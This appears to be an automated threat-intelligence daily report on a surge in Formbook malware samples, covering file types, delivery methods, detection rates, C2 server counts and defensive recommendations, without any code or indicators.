Daily Summary
Formbook activity surged dramatically with 95 new samples, a 346% increase over the 7-day average of 21. This marks the highest single-day volume observed this month and signals a coordinated campaign push. The rising trend suggests adversaries are testing distribution channels at scale.
New Samples Detected
Executable files dominate at 80% of new samples, consistent with Formbook’s traditional delivery via packed .exe loaders. JavaScript files account for 16%, showing a non-standard but growing vector for this family. The single .hta and .vbs samples indicate residual spear-phishing use. No unusual naming conventions were observed; samples use randomized, truncated alphanumeric strings.
Distribution Methods
The file type distribution points primarily to email attachments likely delivered through malspam campaigns. The high .js count suggests an increase in macro-less, script-based initial loaders, possibly hosted on compromised sites or shared via cloud links. The single .dll file may indicate a sideloading attempt in environments with application whitelisting.
Detection Rate
Current AV detection for these samples is moderate, with several .js variants showing delayed signature updates. The shift to script-based loaders may allow a brief window of evasion before static analysis rules catch updated patterns. Behavioral detection remains effective against the final Formbook payload due to its characteristic registry and process injection behaviors.
C2 Infrastructure
55 new C2 servers were identified today, a sharp increase from the weekly norm. No geographic clustering is evident; IPs span multiple hosting providers in Eastern Europe and North America. Several servers appear to use dynamic DNS domains, suggesting low-lifespan setups to evade sinkholing.
7-Day Trend
Today’s 346% spike breaks a relatively quiet week where daily counts hovered between 18 and 25 samples. This surge likely reflects the start of a new campaign wave rather than a sustainable rate of activity.
Security Analysis
Notably, the .js loader samples today share obfuscation routines with recent Remcos loader scripts, suggesting potential code reuse between these families. This overlap may indicate a shared initial access broker or tooling reuse in underground markets. Defensive teams should implement web filtering to block download patterns for .js files masquerading as fax or invoice documents, and ensure behavioral detection rules for script interpreters are tuned to alert on Process.Start with network arguments, which is common across these script-based loaders.